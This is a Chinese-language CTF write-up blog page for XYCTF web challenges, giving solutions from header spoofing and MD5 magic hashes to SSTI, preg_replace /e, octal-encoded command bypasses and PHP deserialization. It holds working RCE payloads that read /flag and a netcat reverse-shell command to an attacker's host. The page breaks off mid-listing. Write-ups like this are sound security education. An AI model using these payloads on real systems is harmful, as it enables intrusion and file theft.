

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/kele6.github.io/img/fluid.png">
  <link rel="icon" href="/kele6.github.io/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="WEBezhttp源代码发现：为了防止忘记密码，我把它们放在某个地方了信息泄露：robots.txt发现 Disallow: &#x2F;l0g1n.txt &#x3D;&#x3D;&gt; 得到账号密码不是 yuanshen.com 来的我不要 &#x3D;&#x3D;&gt;Referer: yuanshen.com你用的不是XYCTF的浏览器&#x3D;&#x3D;&gt; User-Age">
<meta property="og:type" content="article">
<meta property="og:title" content="XYCTF">
<meta property="og:url" content="https://junske51.github.io/kele6.github.io/2024/04/14/XYCTF/index.html">
<meta property="og:site_name" content="可乐">
<meta property="og:description" content="WEBezhttp源代码发现：为了防止忘记密码，我把它们放在某个地方了信息泄露：robots.txt发现 Disallow: &#x2F;l0g1n.txt &#x3D;&#x3D;&gt; 得到账号密码不是 yuanshen.com 来的我不要 &#x3D;&#x3D;&gt;Referer: yuanshen.com你用的不是XYCTF的浏览器&#x3D;&#x3D;&gt; User-Age">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-04-14T14:31:07.000Z">
<meta property="article:modified_time" content="2024-05-02T15:41:41.219Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>XYCTF - 可乐</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/kele6.github.io/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/kele6.github.io/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/kele6.github.io/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"junske51.github.io","root":"/kele6.github.io/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/kele6.github.io/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/kele6.github.io/js/utils.js" ></script>
  <script  src="/kele6.github.io/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/kele6.github.io/">
      <strong>kele</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/kele6.github.io/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="XYCTF"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-04-14 22:31" pubdate>
          April 14, 2024 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.5k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          21 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">XYCTF</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="ezhttp"><a href="#ezhttp" class="headerlink" title="ezhttp"></a>ezhttp</h2><p>源代码发现：为了防止忘记密码，我把它们放在某个地方了<br>信息泄露：robots.txt<br>发现 Disallow: &#x2F;l0g1n.txt &#x3D;&#x3D;&gt; 得到账号密码<br>不是 yuanshen.com 来的我不要 &#x3D;&#x3D;&gt;<strong>Referer: yuanshen.com</strong><br>你用的不是XYCTF的浏览器&#x3D;&#x3D;&gt; <strong>User-Agent: XYCTF</strong><br>非本地用户禁止访问！ &#x3D;&#x3D;&gt;<strong>X-Forwarded-For: 127.0.0.1    X-Real-Ip: 127.0.0.1  (这两个都行不通)</strong><br>最终： <strong>Client-Ip: 127.0.0.1</strong><br>不是从 ymzx.qq.com 代理来的我不玩&#x3D;&#x3D;&gt;<strong>Via: ymzx.qq.com</strong><br>有点饿，想吃点XYCTF的小饼干&#x3D;&#x3D;&gt;<strong>Cookies: XYCTF</strong><br>———<strong>冒号后面加空格！！！*（尤其是hackbar）</strong><br><em>OVER</em></p>
<h2 id="Warm-Up"><a href="#Warm-Up" class="headerlink" title="Warm Up"></a>Warm Up</h2><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">$_GET<span class="hljs-selector-attr">[<span class="hljs-string">&#x27;val1&#x27;</span>]</span> != $_GET<span class="hljs-selector-attr">[<span class="hljs-string">&#x27;val2&#x27;</span>]</span> &amp;&amp; <span class="hljs-built_in">md5</span>($_GET<span class="hljs-selector-attr">[<span class="hljs-string">&#x27;val1&#x27;</span>]</span>) == <span class="hljs-built_in">md5</span>($_GET<span class="hljs-selector-attr">[<span class="hljs-string">&#x27;val2&#x27;</span>]</span><br></code></pre></td></tr></table></figure>

<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">isset</span><span class="hljs-params">(<span class="hljs-variable">$md5</span>)</span></span> &amp;&amp; <span class="hljs-variable">$md5</span> == <span class="hljs-built_in">md5</span>(<span class="hljs-variable">$md5</span>)<br></code></pre></td></tr></table></figure>

<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-variable">$XY</span> != <span class="hljs-string">&quot;XYCTF_550102591&quot;</span> &amp;&amp; <span class="hljs-built_in">md5</span>(<span class="hljs-variable">$XY</span>) == <span class="hljs-built_in">md5</span>(<span class="hljs-string">&quot;XYCTF_550102591&quot;</span>)<br></code></pre></td></tr></table></figure>

<p><strong>payload：val1&#x3D;240610708&amp;val2&#x3D;s878926199a&amp;md5&#x3D;0e215962017&amp;XY&#x3D;QNKCDZO&amp;XYCTF&#x3D;QNKCDZO</strong><br>显示 LLeeevvveeelll222.php&#x3D;&#x3D;&gt; 打开<br><code>if (isset($_POST[&#39;a&#39;]) &amp;&amp; !preg_match(&#39;/[0-9]/&#39;, $_POST[&#39;a&#39;]) &amp;&amp; intval($_POST[&#39;a&#39;])) &#123;  echo &quot;操作你O.o&quot;;  echo preg_replace($_GET[&#39;a&#39;],$_GET[&#39;b&#39;],$_GET[&#39;c&#39;]);</code></p>
<p>POST_a用数组绕过+++++e模式<br><strong>payload：?a&#x3D;&#x2F;a&#x2F;e&amp;b&#x3D;system(‘cat &#x2F;flag’)&amp;c&#x3D;&#x2F;a&#x2F;e————POST: a[]&#x3D;1</strong><br><em>OVER</em></p>
<h2 id="ezMake-命令执行绕过-shell变量替换符读文件"><a href="#ezMake-命令执行绕过-shell变量替换符读文件" class="headerlink" title="ezMake(命令执行绕过+shell变量替换符读文件 )"></a>ezMake(命令执行绕过+shell变量替换符读文件 )</h2><p><strong>利用shell变量替换符$(&lt;file)读文件</strong></p>
<p>直接echo $(&lt;flag)</p>
<p>发现不行</p>
<p>试试echo $$(&lt;&#x2F;flag)可行</p>
<h2 id="ez-Make-读文件-文件名过滤"><a href="#ez-Make-读文件-文件名过滤" class="headerlink" title="ez?Make(读文件+文件名过滤)"></a>ez?Make(读文件+文件名过滤)</h2><p>通过shell正则匹配到flag文件,用more读取(大概禁了f,l,a,g ,&#x2F;字符)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">cd .. &amp;&amp;cd .. &amp;&amp;cd .. &amp;&amp;more [^e][^b][^b][^b]<br></code></pre></td></tr></table></figure>

<h2 id="εZ-¿м-Kε¿-报错读文件-makefile自动变量"><a href="#εZ-¿м-Kε¿-报错读文件-makefile自动变量" class="headerlink" title="εZ?¿м@Kε¿?(报错读文件+makefile自动变量)"></a>εZ?¿м@Kε¿?(报错读文件+makefile自动变量)</h2><p>Makefile 自动变量<br>在Makefile中，大家经常会见到类似@ 、 @、@、^、$&lt;这种类型的变量。这种变量一般称为自动变量，自动变量是局部变量，作用域范围在当前的规则内，它们分别代表不同的含义：<br>$@：目标<br>$^：所有目标依赖<br>$&lt;：目标依赖列表中的第一个依赖<br>$?：所有目标依赖中被修改过的文件<br>这里第一个依赖是就是 &#x2F;flag<br>(注意&#x3D;&#x3D;坑点&#x3D;&#x3D;，之前不要试$&gt;，会导致重定向输出创建新文件了，直接影响了后续判断为依赖是<br>FLAG,卡了半天读不到&#x2F;flag)</p>
<p>配合报错带出即可 参照前面ezMake<br>坑点:这里两个 $$ 才代表一个 $</p>
<p>payload:$$(&lt;$&lt;)</p>
<h2 id="easymd5-文件比较"><a href="#easymd5-文件比较" class="headerlink" title="easymd5(文件比较)"></a>easymd5(文件比较)</h2><p>将JPG文件甩在工具fastcoll上<br>生成2个文件<br><em>OVER</em></p>
<h2 id="说英文的复读-机弱密码-SSTI的简单绕过-requests"><a href="#说英文的复读-机弱密码-SSTI的简单绕过-requests" class="headerlink" title="说英文的复读(机弱密码+SSTI的简单绕过(requests))"></a>说英文的复读(机弱密码+SSTI的简单绕过(requests))</h2><p>1.抓包爆破&#x3D;&#x3D;&gt;密码：asdqwe<br>2.fuzz&#x3D;&gt;发现SSTI</p>
<p>requests,args,.没有过滤</p>
<p>直接<code>requests</code>绕过关键词过滤<code>|attr()</code>绕过<code>[]</code>过滤</p>
<p>?sentence&#x3D;(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()啊啊&amp;a&#x3D;<strong>class</strong>&amp;b&#x3D;<strong>base</strong>&amp;c&#x3D;<strong>subclasses</strong>&amp;d&#x3D;<strong>getitem</strong>&amp;e&#x3D;<strong>init</strong>&amp;f&#x3D;<strong>globals</strong>&amp;g&#x3D;popen&amp;h&#x3D;cat &#x2F;flag</p>
<p>或者</p>
<p>[[lipsum|attr(request.args.glo)|attr(request.args.ge)(request.args.o)|attr(request.args.po)(request.args.cmd)|attr(request.args.re)()&amp;glo&#x3D;<strong>globals</strong>&amp;ge&#x3D;<strong>getitem</strong>&amp;o&#x3D;os&amp;po&#x3D;popen&amp;cmd&#x3D;cat &#x2F;flag&amp;re&#x3D;read</p>
<h2 id="zzl的护理小课堂-js代码审计"><a href="#zzl的护理小课堂-js代码审计" class="headerlink" title="zzl的护理小课堂(js代码审计)"></a>zzl的护理小课堂(js代码审计)</h2><p>var flagXhr &#x3D; new XMLHttpRequest();<br>                        flagXhr.open(‘GET’, ‘flag.php’, true);<br>                        flagXhr.onreadystatechange &#x3D; function() {<br>                            if (flagXhr.readyState &#x3D;&#x3D;&#x3D; 4 &amp;&amp; flagXhr.status &#x3D;&#x3D;&#x3D; 200) {<br>                                var flag &#x3D; flagXhr.responseText;<br>                                document.getElementById(‘scoreDisplay’).innerText &#x3D; “Flag: “ + flag;<br>                            }<br>                        };<br>                        flagXhr.send(); &#x2F;&#x2F; 发送请求获取 flag</p>
<p>控制台：<br>var flagXhr &#x3D; new XMLHttpRequest();<br>                        flagXhr.open(‘GET’, ‘flag.php’, true);<br>                        flagXhr.onreadystatechange &#x3D; function() {<br>                            if (flagXhr.readyState &#x3D;&#x3D;&#x3D; 4 &amp;&amp; flagXhr.status &#x3D;&#x3D;&#x3D; 200) {<br>                                var flag &#x3D; flagXhr.responseText;<br>                                document.getElementById(‘scoreDisplay’).innerText &#x3D; “Flag: “ + flag;<br>                            }<br>                        };<br>                        flagXhr.send();<br><em>OVER</em></p>
<h2 id="牢大"><a href="#牢大" class="headerlink" title="牢大"></a>牢大</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>  <br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);  <br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Kobe</span>(<span class="hljs-params"><span class="hljs-variable">$cmd</span></span>)  </span><br><span class="hljs-function"></span>&#123;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$cmd</span>) &gt; <span class="hljs-number">13</span>) &#123;  <br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;see you again~&quot;</span>);  <br>    &#125;  <br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/echo|exec|eval|system|fputs|\.|\/|\\|/i&quot;</span>, <span class="hljs-variable">$cmd</span>)) &#123;  <br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;肘死你&quot;</span>);  <br>    &#125;  <br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$_GET</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$val_name</span> =&gt; <span class="hljs-variable">$val_val</span>) &#123;  <br>        <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/bin|mv|cp|ls|\||f|a|l|\?|\*|\&gt;/i&quot;</span>, <span class="hljs-variable">$val_val</span>)) &#123;  <br>            <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;what can i say&quot;</span>;  <br>        &#125;  <br>    &#125;  <br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$cmd</span>;  <br>&#125;  <br><br><span class="hljs-variable">$cmd</span> = <span class="hljs-title function_ invoke__">Kobe</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);  <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;#man,&quot;</span> . <span class="hljs-variable">$cmd</span>  . <span class="hljs-string">&quot;,manba out&quot;</span>;  <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;  <br><span class="hljs-keyword">eval</span>(<span class="hljs-string">&quot;#man,&quot;</span> . <span class="hljs-variable">$cmd</span> . <span class="hljs-string">&quot;,mamba out&quot;</span>);<br></code></pre></td></tr></table></figure>

<p>有长度限制，好说strlen($cmd) &gt; 13<br>考虑 反引号执行系统命令(只有两个字符) 等价于shell_exec(); 这个命令是没有回显的<br> 做个转接头 逃逸 命令长度限制<br><code>$_GET[1]</code>;</p>
<p>在php中是单行注释符 用 %0a换行即可绕过（到下一行了）</p>
<p>cmd&#x3D;%0a<code>$_GET[1]</code>;%23</p>
<p>没有回显   考虑反弹shell</p>
<p>首先是这道题的<strong>pyload:?cmd&#x3D;%0a<code>$_GET[1]</code>;%23&amp;1&#x3D;nc</strong> 你的映射的ip地址，你映射的端口 $’\57\142\151\156\57\142\141\163\150’<br>首先我们以pyload，一个一个分析<br>1.前面的get[1]不用多说就是负责绕过长度的嘛，否则也实行不了想要的命令对吧<br>2.后面为什么用nc反弹，而不能用ls，cat这些出信息，首先用的是反引号，得前面加print或者echo什么把信息打印出来（但这里echo被过滤掉了）<br>然后用print的话就无法构造$_GET，所以就nc反弹了，如果不知道什么事nc反弹那得要学一下渗透什么的，那知识点涉及还是有点多的<br>不过就是要用nc肯定没错，既然他无法回显信息，那我只要连接到我攻击机上回显不就行了吗，然后这里就要涉及到内网穿透，就是将自己的攻击机ip地址映射到公网，你可以使用</p>
<h2 id="ezRCE"><a href="#ezRCE" class="headerlink" title="ezRCE"></a>ezRCE</h2><p>payload:八进制绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>); <br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">waf</span>(<span class="hljs-params"><span class="hljs-variable">$cmd</span></span>)</span><br><span class="hljs-function"></span>&#123;    <span class="hljs-variable">$white_list</span> = [<span class="hljs-string">&#x27;0&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span>,<span class="hljs-string">&#x27;2&#x27;</span>,<span class="hljs-string">&#x27;3&#x27;</span>,<span class="hljs-string">&#x27;4&#x27;</span>,<span class="hljs-string">&#x27;5&#x27;</span>,<span class="hljs-string">&#x27;6&#x27;</span>,<span class="hljs-string">&#x27;7&#x27;</span>,<span class="hljs-string">&#x27;8&#x27;</span>,<span class="hljs-string">&#x27;9&#x27;</span>,<span class="hljs-string">&#x27;\\&#x27;</span>,<span class="hljs-string">&#x27;\&#x27;&#x27;</span>,<span class="hljs-string">&#x27;$&#x27;</span>,<span class="hljs-string">&#x27;&lt;&#x27;</span>];<br>    <span class="hljs-variable">$cmd_char</span> = <span class="hljs-title function_ invoke__">str_split</span>(<span class="hljs-variable">$cmd</span>); <br>    <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$cmd_char</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$char</span>)&#123; <br>        <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$char</span>, <span class="hljs-variable">$white_list</span>))&#123; <br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;really ez?&quot;</span>); <br>        &#125; <br>    &#125; <br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$cmd</span>; <br>&#125; <br><span class="hljs-variable">$cmd</span>=<span class="hljs-title function_ invoke__">waf</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;cmd&quot;</span>]); <br><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$cmd</span>);<br></code></pre></td></tr></table></figure>

<p>**?cmd&#x3D;$%27\143\141\164%27&lt;$%27\57\146\154\141\147%27**———%27-&gt; ‘</p>
<p><a target="_blank" rel="noopener" href="https://fushuling.com/index.php/2023/03/04/%E5%88%A9%E7%94%A8shell%E8%84%9A%E6%9C%AC%E5%8F%98%E9%87%8F%E6%9E%84%E9%80%A0%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E5%91%BD%E4%BB%A4/">https://fushuling.com/index.php/2023/03/04/%E5%88%A9%E7%94%A8shell%E8%84%9A%E6%9C%AC%E5%8F%98%E9%87%8F%E6%9E%84%E9%80%A0%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E5%91%BD%E4%BB%A4/</a><br>1.列举了白名单，数字可用，想到八进制（十六进制有字母）<br>2.不能纯八进制绕过，会被当做字符串，没有意义，要用**$’八进制’<strong>包裹<br>3.空格在linux系统里面用八进制是不可以的，</strong>可以替代空格<strong>，就是会转义但是不能执行（比如：会被转义成cat &#x2F;flag，但是不执行）</strong>空格不能用八进制绕过**，正好题目给了&lt;——————–如果不给&lt; 肯定会给别的，就是找替代品<br>4.于是被分成两部分，用&lt;连接</p>
<h2 id="ezClass"><a href="#ezClass" class="headerlink" title="ezClass"></a>ezClass</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>  <br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);  <br><span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];  <br><span class="hljs-variable">$aa</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;aa&#x27;</span>];  <br><span class="hljs-variable">$b</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>];  <br><span class="hljs-variable">$bb</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;bb&#x27;</span>];  <br><span class="hljs-variable">$c</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];  <br>((<span class="hljs-keyword">new</span> <span class="hljs-variable">$a</span>(<span class="hljs-variable">$aa</span>))-&gt;<span class="hljs-variable">$c</span>())((<span class="hljs-keyword">new</span> <span class="hljs-variable">$b</span>(<span class="hljs-variable">$bb</span>))-&gt;<span class="hljs-variable">$c</span>());<br></code></pre></td></tr></table></figure>

<p>结构 new 一个类(参数)-&gt;执行方法<br> 利用Error类的静态方法 getMessage返回任意字符结合php的动态执行特性</p>
<p>?a&#x3D;Error&amp;aa&#x3D;system&amp;b&#x3D;Error&amp;bb&#x3D;cat &#x2F;flag&amp;c&#x3D;getMessage</p>
<h2 id="ezSerialize"><a href="#ezSerialize" class="headerlink" title="ezSerialize"></a>ezSerialize</h2><p>构造POC</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Flag</span> </span>&#123;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$token</span>;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$password</span>;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br><br>​    <span class="hljs-variable language_">$this</span>-&gt;token=&amp;<span class="hljs-variable language_">$this</span>-&gt;password;<br><br>​    <span class="hljs-variable language_">$this</span>-&gt;password =<span class="hljs-number">1</span>;<br><br>  &#125;<br><br>&#125;<br><br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">Flag</span>;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br></code></pre></td></tr></table></figure>

<p>题目将token的值弄成了md5(mt_rand())，我们要想传值给password，使其与token相等是不可能的，那么就只有把password的地址传给token，使password跟着token的改变而改变。</p>
<p>知识点：</p>
<p>php按地址传参，我们只需要让token和passowrd指向同一块地址就可以了。</p>
<p>本地运行后得到O:4:”Flag”:2:{s:5:”token”;i:1;s:8:”password”;R:2;}</p>
<p>传参进入下一步，得到fpclosefpclosefpcloseffflllaaaggg.php</p>
<p>得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span 